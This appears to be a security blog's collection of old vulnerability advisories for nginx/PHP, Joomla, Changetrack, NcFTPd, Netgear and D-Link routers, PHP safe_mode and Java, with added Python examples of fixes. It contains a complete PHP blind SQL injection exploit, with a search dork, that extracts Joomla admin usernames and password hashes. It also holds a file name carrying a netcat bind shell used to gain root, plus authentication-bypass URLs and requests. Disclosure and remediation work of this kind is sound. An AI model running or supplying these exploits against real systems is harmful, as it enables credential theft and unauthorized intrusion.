May 26

nginx [engine x] is an HTTP and reverse proxy server, as well as a mail proxy server, written by Igor Sysoev. It has been running for more than five years on many heavily loaded Russian sites including. The vulnerability lets a file of another type (an image, for example) be parsed and executed as a PHP file. It is a very critical bug.

Generally, nginx hands PHP files to a FastCGI backend. Example:

    location ~ \.php$ {
        root html;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
        include fastcgi_params;
    }

In the location block, nginx matches the request by its URI, and SCRIPT_FILENAME is built from $fastcgi_script_name. Whether the PHP backend then re-splits that path into a script and a PATH_INFO remainder is controlled by the cgi.fix_pathinfo option in php.ini, which is enabled by default.

Assume the URL http://www.goitowrld.com/nginx.jpg exists. Now request the following URL:

http://www.goitworld.com/nginx.jpg/nginx.php

This request has the URI /nginx.jpg/nginx.php.

The location block matches it, so the request is handed to FastCGI with the SCRIPT_FILENAME variable set to /script/nginx.jpg/nginx.php.

Because cgi.fix_pathinfo is set to 1, PHP splits this into SCRIPT_FILENAME and PATH_INFO:

/script/nginx.jpg and nginx.php

As a result, nginx.jpg is parsed as a PHP file.

Requesting http://www.goitowrld.com/nginx.jpg returns:

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: image/jpeg
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

Requesting http://www.goitowrld.com/nginx.jpg/nginx.php returns:

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

Solution:

1. Modify php.ini and set the parameter

    cgi.fix_pathinfo=0

2. Modify the nginx configuration:

    if ( $fastcgi_script_name ~ \..*\/.*php ) {
        return 403;
    }
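The split that cgi.fix_pathinfo=1 performs, and the effect of both mitigations, can be checked offline. The following is an added example (not code from the nginx or PHP projects, nor from the original post) written in Python: it walks back the path the way PATH_INFO fixing does against a constructed, in-memory file list (the /script prefix and file names are taken from the text above; the rest is assumed), and applies the page's own nginx regex to the URI.

```python
import re
import posixpath

# Constructed stand-in for the document root: only these files exist.
# Paths are absolute, as nginx builds them for SCRIPT_FILENAME.
FAKE_FS = {
    "/script/index.php",
    "/script/nginx.jpg",
}

# The regex from the page's nginx mitigation, applied to $fastcgi_script_name.
NGINX_DENY = re.compile(r"\..*/.*php")


def split_path_info(script_filename, exists=FAKE_FS.__contains__):
    """Mimic cgi.fix_pathinfo=1: strip trailing components until an existing
    path is found; the stripped remainder becomes PATH_INFO."""
    path = script_filename
    path_info = ""
    while path and path != "/":
        if exists(path):
            return path, path_info
        head, tail = posixpath.split(path)
        path_info = "/" + tail + path_info
        path = head
    return None, script_filename


def fastcgi_target(uri, root="/script"):
    """What the FastCGI backend actually executes for a URI with
    cgi.fix_pathinfo=1 and the page's location block."""
    return split_path_info(root + uri)


def allowed_with_fix_pathinfo_off(uri, root="/script"):
    """cgi.fix_pathinfo=0: SCRIPT_FILENAME is taken literally, no walk back,
    so a path like /nginx.jpg/nginx.php simply does not exist."""
    return (root + uri) in FAKE_FS


def allowed_by_nginx_rule(uri):
    """Page's second mitigation: 403 when a dot-bearing component is
    followed by a further /...php component."""
    return NGINX_DENY.search(uri) is None


def executed_script_is_php(uri, root="/script"):
    """Defensive invariant: whatever the split resolves to must itself be a
    .php file, otherwise the request must not reach the interpreter."""
    script, _ = fastcgi_target(uri, root)
    return script is not None and script.endswith(".php")


if __name__ == "__main__":
    for uri in ("/index.php", "/nginx.jpg/nginx.php", "/index.php/extra"):
        print(uri, fastcgi_target(uri), "nginx rule allows:", allowed_by_nginx_rule(uri))
```

Note that the regex mitigation also rejects legitimate URIs such as /dir.v2/index.php, since any dot before a later /...php component matches; the invariant check in executed_script_is_php (or cgi.fix_pathinfo=0) is the more precise fix.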

Feb 26

Test Code


#!/usr/bin/php
<?php

ini_set("max_execution_time", 0);

print_r('
###########################################################################
[»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability
###########################################################################
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ Spécial >>>>His0k4 >>>>   Tous les hackers Algérie
[»] Dork: inurl:index.php?option=com_joomlaconnect_be
###########################################################################
###########################################################################
#
#  Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit
#  [x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3
#
#
###########################################################################
');

if ($argc > 1) {
    $url = $argv[1];
    // Baseline response length for an always-true condition.
    $r = strlen(file_get_contents($url."+and+1=1--"));
    echo "\nExploiting:\n";
    // Response length for an always-false condition.
    $w = strlen(file_get_contents($url."+and+1=0--"));
    // Percentage difference between the two; used as the decision threshold below.
    $t = abs((100-($w/$r*100)));

    echo "Username: ";
    $count = 0;
    // Determine the username length: stop at the first position whose byte is 0.
    for ($i=1; $i <= 30; $i++) {
        $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
        if (abs((100-($laenge/$r*100))) > $t-1) {
            $count = $i;
            $i = 30;
        }
    }
    // Recover each username character by comparing its byte value in steps of two.
    for ($j = 1; $j < $count; $j++) {
        for ($i = 46; $i <= 122; $i=$i+2) {
            if ($i == 60) {
                $i = 98;
            }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 122;
            }
        }
    }

    echo "\nPassword: ";
    // Same procedure for the password hash column (fixed length of 49 positions).
    for ($j = 1; $j <= 49; $j++) {
        for ($i = 46; $i <= 102; $i=$i+2) {
            if ($i == 60) {
                $i = 98;
            }
            $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
            if (abs((100-($laenge/$r*100))) > $t-1) {
                $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
                if (abs((100-($laenge/$r*100))) > $t-1) {
                    echo chr($i-1);
                } else {
                    echo chr($i);
                }
                $i = 102;
            }
        }
    }
}
?>
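The script above works only because the component splices the id parameter straight into its SQL. The following added example (Python with the standard sqlite3 module, not Joomla's code and not part of the original post) shows the vulnerable pattern beside the hardened one on a constructed in-memory database: the table and column names jos_users, username and password come from the script above, while biz_pages and all row values are made up. The response_differs check reproduces the true/false comparison the script relies on and shows that it yields nothing once the parameter is validated and bound.

```python
import sqlite3


def make_db():
    """Constructed sample database standing in for the Joomla tables the
    script above queries; every value is made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE biz_pages (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO biz_pages VALUES (3, 'Example business page');
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash-value');
    """)
    return conn


def vulnerable_show_biz_page(conn, raw_id):
    """String concatenation: the request parameter becomes part of the SQL
    text, so appended conditions change what the query returns."""
    sql = "SELECT title FROM biz_pages WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


def hardened_show_biz_page(conn, raw_id):
    """Validate the type first, then bind the value as a parameter so the
    database never interprets request data as SQL."""
    try:
        page_id = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    rows = conn.execute("SELECT title FROM biz_pages WHERE id=?", (page_id,))
    return [row[0] for row in rows]


def _attempt(handler, conn, raw_id):
    """Run a handler and normalise a validation failure into a result, the
    way an HTTP layer would turn it into an error page."""
    try:
        return ("ok", handler(conn, raw_id))
    except ValueError:
        return ("rejected", None)


def response_differs(handler, conn, raw_id):
    """The signal a blind injection needs: does an appended true condition
    produce a different response from an appended false one?"""
    true_case = _attempt(handler, conn, raw_id + " and 1=1--")
    false_case = _attempt(handler, conn, raw_id + " and 1=0--")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler leaks a difference:", response_differs(vulnerable_show_biz_page, db, "3"))
    print("hardened handler leaks a difference:", response_differs(hardened_show_biz_page, db, "3"))
```

The length-based oracle in the PHP script is just a coarse way of detecting the same difference; once both conditions yield the identical rejection, there is nothing left to measure.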
Oct 03

TITLE:
Changetrack Privilege Escalation Vulnerability

SECUNIA ADVISORY ID:
SA36756

VERIFY ADVISORY:
http://secunia.com/advisories/36756/

DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.

The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.

Successful exploitation requires write privileges to a directory
scanned by Changetrack.

SOLUTION:
Use Changetrack to track trusted directories only.

PROVIDED AND/OR DISCOVERED BY:
Marek Grzybowski

——————————————————————————–
Example of exploitation:

———— Attacker ———-

rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
rick@testmachine:~/testt$ ls
<`nc -l -p 5001 -e $SHELL`

——————————–

———— root ————–

testmachine:~# changetrack

———— root ————–

———— Attacker ———-

rick@testmachine:~/testt$ nc 127.0.0.1 5001
id
uid=0(root) gid=0(root) groups=0(root)

——————————–
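The root cause above is a file name reaching a shell as part of a command string. The following added example (Python, not Changetrack's own code, which is a Perl script) creates a temporary directory containing a constructed name with backticks and shows the two safe ways to handle it: passing arguments as a list so no shell is involved, and quoting with shlex.quote when a shell cannot be avoided. The tracked-directory layout and the harmless `echo injected` name are constructed for the demonstration; it assumes a POSIX system with ls and sh available.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed file name with shell metacharacters. Unlike the one in the
# advisory it is harmless even if evaluated, which keeps the demo safe.
TRICKY_NAME = "<`echo injected`>"


def make_tracked_dir():
    """Create a temporary directory holding TRICKY_NAME, as an unprivileged
    user could in any directory the tracker scans."""
    directory = tempfile.mkdtemp()
    with open(os.path.join(directory, TRICKY_NAME), "w"):
        pass
    return directory


def unsafe_command_line(directory, name):
    """The pattern the advisory describes: the file name is spliced into a
    command string that is later handed to a shell. Returned, never run."""
    return "ls -l " + os.path.join(directory, name)


def safe_list(directory):
    """Pass arguments as a list: no shell parses them, so nothing in the
    file name is interpreted. Returns the directory entries."""
    out = subprocess.run(["ls", "-1", "--", directory],
                         capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


def safe_echo_via_shell(name):
    """When a shell is unavoidable, shlex.quote turns the name into one
    literal word; the backticks are printed, not evaluated."""
    cmd = "printf '%s\\n' " + shlex.quote(name)
    out = subprocess.run(["sh", "-c", cmd], capture_output=True, text=True, check=True)
    return out.stdout.rstrip("\n")


def contains_shell_metachars(name):
    """Cheap pre-check a tracker could use to log or skip suspicious names
    in addition to (not instead of) correct quoting."""
    return any(c in name for c in "`$<>|;&()\n")


if __name__ == "__main__":
    d = make_tracked_dir()
    print("would be unsafe:", unsafe_command_line(d, TRICKY_NAME))
    print("listed literally:", safe_list(d))
    print("echoed literally:", safe_echo_via_shell(TRICKY_NAME))
```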

Aug 12

A vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass the security check that verifies a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

We fixed this problem last night and have been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.

Jul 31

Discovered by:
    Kingcope
    Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
    27th July 2009

Greetings:
    Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
    Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+ On FreeBSD you can symlink directories like '/'.

Cheerio,

Kingcope

Jun 16

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.

II. DETAILS

The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below).  The "indextop.htm" page requires
authentication (HTTP Basic Authorization).

<script language="javascript" type="text/javascript">
function loadnext() {
//document.forms[0].target.value="top";
document.forms[0].submit();
//top.location.href="../cgi-bin/webcm?nextpage=../html/indextop.htm";
}</script></head>
<body bgcolor="#ffffff" onload="loadnext()" >

Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>

If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field.  If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm".  It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.

Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm

This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known.  All the script is
doing is making sure authentication is forced upon the user.  The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:

http://TARGET_IP/html/stattbl.htm

Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 – Forbidden)

Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 – OK)

In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:

/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)

There are many other files that are accessible by calling them directly
instead of going via the "webcm" script, the above are just a sample. In
addition, it is possible to specify paths to the "webcm" script as shown
below:

http://TARGET_IP/cgi-bin/webcm?nextpage=../../

This allows an attacker to enumerate what files and directories exist
within the www root directory and beyond by using 200, 403 and 404
errors as a guide.
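Both findings above come from authorization being enforced by one entry script rather than at a single chokepoint keyed on the target file. The following added example (Python, not the router's firmware code) shows such a chokepoint: every request path is normalized before the access decision, so /html/stattbl.htm and webcm?nextpage=../html/stattbl.htm are judged identically, and a nextpage value that climbs above the document root is rejected instead of being used to probe for files. The public-path allowlist and the /html/login.htm name are assumptions; /cgi-bin/webcm, nextpage and the file names come from the advisory.

```python
import posixpath

# Constructed policy: everything requires authentication except the login
# entry points. In a real device this would be derived from the page set.
PUBLIC_PATHS = {"/cgi-bin/webcm", "/html/login.htm"}


def normalize_request_path(path):
    """Collapse '.' and '..' so that /html/../html/x and /html/x compare equal."""
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)


def resolve_nextpage(nextpage):
    """webcm's nextpage is relative to /cgi-bin/. Resolve it as a relative
    path so that leading '..' survives normalization and can be detected;
    return None when it escapes the document root."""
    rel = posixpath.normpath(posixpath.join("cgi-bin", nextpage.lstrip("/")))
    if rel == ".." or rel.startswith("../"):
        return None
    return "/" if rel == "." else "/" + rel


def authorize(path, authenticated, nextpage=None):
    """Single chokepoint: decide by the normalized target file, not by which
    URL was used to reach it. Returns an HTTP status code."""
    target = normalize_request_path(path)
    if target == "/cgi-bin/webcm" and nextpage is not None:
        target = resolve_nextpage(nextpage)
        if target is None:
            return 400
    if target in PUBLIC_PATHS:
        return 200
    return 200 if authenticated else 401


if __name__ == "__main__":
    for req in (("/cgi-bin/webcm", False, "../html/stattbl.htm"),
                ("/html/stattbl.htm", False, None),
                ("/html/../html/modemmenu.htm", False, None),
                ("/cgi-bin/webcm", True, "../../")):
        print(req, "->", authorize(*req))
```

A web server that maps the whole /html and /gateway trees through this function cannot be bypassed by fetching a file directly, because the direct path and the webcm-relative path normalize to the same target and the decision is made only there.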

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded.  Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.

IV. CREDIT

Discovered by Tom Neaves

May 26

Title  : PHP <= 5.2.9 SafeMode Bypass Vulnerability (win32)
Affected Version : Tested on 5.2.8 and 5.2.6, but previous versions may be affected
Vendor  Site   : www.php.net

Vulnerability Discovered by   : www.abysssec.com

Description :

Here is another safe_mode bypass vulnerability that exists in PHP <= 5.2.9 on Windows.
The problem comes from OS behaviour: the way PHP is implemented against, and interfaces with,
the operating system's directory structure. PHP does not distinguish between directory handling
on Linux and on Windows, and this can give an attacker the ability to execute his or her
commands on the target machine even with safe_mode on (a php.ini setting).

Vulnerability :

On Linux, when you want to open a directory, for example the PHP directory, you have to
use /usr/bin/php and cannot use \usr\bin\php. Windows, however, does not distinguish
between slash and backslash, so there is no difference between c:\php and c:/php. This is
not a vulnerability by itself, but because of this simple behaviour the "\" character can be
used in PHP to escape safe_mode through functions like exec.

PoC / Exploit :

orginal : www.abysssec.com/safemod-windows.zip
mirror  : www.milw0rm.com/sploits/2009-safemod-windows.zip

note : this vulnerability is published for educational purposes only and to show that the vulnerability exists,
so the author will not be responsible for any damage caused by using it.

for more information visit Abysssec.com
feel free to contact me at admin [at] abysssec.com

May 20

Introduction

Five months ago, CVE-2008-5353 and other vulnerabilities were publicly
disclosed, and fixed by Sun.

CVE-2008-5353 allows malicious code to escape the Java sandbox and run
arbitrary commands with the permissions of the executing user. This may
result in untrusted Java applets executing arbitrary code merely by
visiting a web page hosting the applet. The issue is trivially
exploitable.

Unfortunately, these vulnerabilities remain in Apple’s shipping JVMs, as
well as Soylatte 1.0.3. As Soylatte does not provide browser plugins,
the impact of the vulnerability is reduced. The recent release of
OpenJDK6/Mac OS X is not affected by CVE-2008-5353.

Work-Arounds

    * Mac OS X users should disable Java applets in their browsers and
      disable ‘Open "safe" files after downloading’ in Safari.
    * Soylatte users running untrusted code should upgrade to an
      OpenJDK6-based release, where possible. No future releases of the
      JRL-based Soylatte branch are planned at this time. If this is an
      issue for you, please feel free to contact me.
    * No work-around is available for users otherwise running Java
      untrusted code.

Proof of Concept

Unfortunately, it seems that many Mac OS X security issues are ignored
if the severity of the issue is not adequately demonstrated. Due to the
fact that an exploit for this issue is available in the wild, and the
vulnerability has been public knowledge for six months, I have decided
to release my own proof of concept to demonstrate the issue.

If you visit the following page, "/usr/bin/say" will be executed on your
system by a Java applet, with your current user permissions. This link
will execute code on your system with your current user permissions. The
proof of concept runs on fully-patched PowerPC and Intel Mac OS X
systems.

http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html

compiled/decompiled: http://milw0rm.com/sploits/2009-javax.tgz

May 17

D-Link released new firmware designed to protect against malware that
alters DNS settings by logging in to the router using default administrative
credentials. There is a flaw in the captcha authentication system that allows
an attacker to glean your WiFi WPA pass phrase from the router with only user-level
access, and without properly solving the captcha.

When you login with the captcha enabled, the request looks like this:

GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52F&auth_id=268D2

The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
you entered, and the auth_id is unique to the captcha image that you viewed
(this presumably allows the router to check the auth_code against the proper captcha image).
The problem is that if you leave off the auth_code and auth_id values, some pages in the
D-Link Web interface think that you’ve properly authenticated, as long as you get
the hash right:

    GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a

Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:

    GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0

When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
retrieve the WPA passphrase directly from the router.

More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/
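The flaw above is a login path that treats a partial credential set (hash only) as authenticated. The following added example (Python, not D-Link's firmware) contrasts that behaviour with a handler that fails closed: all three fields must be present, the auth_code must match the captcha that was issued under that auth_id, and each issued captcha is single-use. The salt, password and captcha answer are constructed; the parameter names hash, auth_code and auth_id, and the description of the hash as a salted MD5 of the password, come from the text above.

```python
import hashlib
import hmac
import secrets

# Constructed values. The page only says the hash is a salted MD5 of the
# password, so the salt and password here are made up for the demo.
SALT = "constructed-salt"
PASSWORD = "constructed-admin-password"
EXPECTED_HASH = hashlib.md5((SALT + PASSWORD).encode()).hexdigest()


class CaptchaStore:
    """Server-side record of issued captchas: auth_id -> expected code.
    Entries are removed on first use so a solved captcha cannot be replayed."""

    def __init__(self):
        self.pending = {}

    def issue(self, code):
        auth_id = secrets.token_hex(3).upper()
        self.pending[auth_id] = code
        return auth_id

    def consume(self, auth_id, code):
        expected = self.pending.pop(auth_id, None)
        return expected is not None and hmac.compare_digest(expected, code)


def weak_login(params, store):
    """The behaviour described above: the hash alone is accepted, so a
    request that omits auth_code and auth_id still authenticates."""
    return hmac.compare_digest(params.get("hash", ""), EXPECTED_HASH)


def hardened_login(params, store):
    """Every login path requires all three fields; the captcha must match an
    outstanding, unused auth_id; any missing field fails closed."""
    required = ("hash", "auth_code", "auth_id")
    if any(params.get(k) in (None, "") for k in required):
        return False
    if not store.consume(params["auth_id"], params["auth_code"]):
        return False
    return hmac.compare_digest(params["hash"], EXPECTED_HASH)


def demo(code_entered, replay=False):
    """Issue one captcha whose answer is 'X7K2Q' (constructed), then attempt
    a hardened login with the code supplied; with replay=True the identical
    request is sent a second time to show single use."""
    store = CaptchaStore()
    auth_id = store.issue("X7K2Q")
    params = {"hash": EXPECTED_HASH, "auth_code": code_entered, "auth_id": auth_id}
    first = hardened_login(params, store)
    if replay:
        return first, hardened_login(params, store)
    return first


if __name__ == "__main__":
    print("hash only, weak handler:", weak_login({"hash": EXPECTED_HASH}, CaptchaStore()))
    print("hash only, hardened handler:", hardened_login({"hash": EXPECTED_HASH}, CaptchaStore()))
    print("correct captcha, then replay:", demo("X7K2Q", replay=True))
```

The important property is that the captcha check is not a separate page that other handlers can skip: the session is only created inside hardened_login, so a later request such as the WPS activation above has nothing to rely on unless this function returned True.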
